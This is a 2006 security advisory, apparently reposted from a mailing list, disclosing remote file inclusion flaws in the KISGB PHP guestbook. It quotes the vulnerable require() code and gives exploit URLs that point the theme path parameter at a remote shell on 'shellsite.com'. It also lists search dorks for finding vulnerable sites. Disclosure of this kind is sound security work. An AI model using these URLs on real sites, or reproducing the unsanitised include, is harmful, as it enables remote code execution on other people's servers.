Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  EternalMart Guestbook 1.1.0 [emgb_admin_path] Remote File Include

  KISGB (Keep It Simple Guest Book)* [default_path_for_the
mes]  Remote File Include

  Xt-News 0.1 : SQL Injection Vulnerability & XSS

From:zeus olimpusklan <zeus.olimpusklan_(at)_gmail.com>
Date:23.12.2006
Subject:Multiple Remote Vulnerabilities in KISGB

###########################################################################
# Advisory #15 Title: Multiple Remote Vulnerabilities in KISGB
#
# Author: 0o_zeus_o0 ( Arturo Z. )
# Contact: zeus@diosdelared.com
# Website: www.diosdelared.com
# Date: 22/12/06
# Risk: critical
# Vendor Url: http://sourceforge.net/projects/kisgb,
http://ravenphpscripts.com
# Affected Software: Keep It Simple Guest Book
# search: inurl:kisgb , intitle:KISGB
#
#Info:
##################################################################
#Bug is risky by since it is possible to be included I cosay malisioso
#that allows to see or to modify the archives
#code:
#if (isset($default_path_for_themes))
require("$default_path_for_themes/$theme");
#else require("$path_to_themes/$theme");
##################################################################
#
#
#http://site/path/gbpath/authenticate.php?path_to_themes=
http://shellsite.com/php.gif?
#
#http://site/path/gbpath/admin.php?default_path_for_themes=
http://shellsite.com/php.gif?
#
#http://site/path/gbpath/upconfig.php?default_path_for_themes=
http://shellsite.com/php.gif?
##################################################################
#VULNERABLE VERSIONS
##################################################################
# 5.0.0
#
##################################################################
#Contact information
#0o_zeus_o0
#zeus@diosdelared.com
#www.diosdelared.com
##################################################################
#greetz: S.S.M, sams, a mi beba
#Original Advisory: http://diosdelared.com/15.txt
##################################################################

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 



Rating@Mail.ru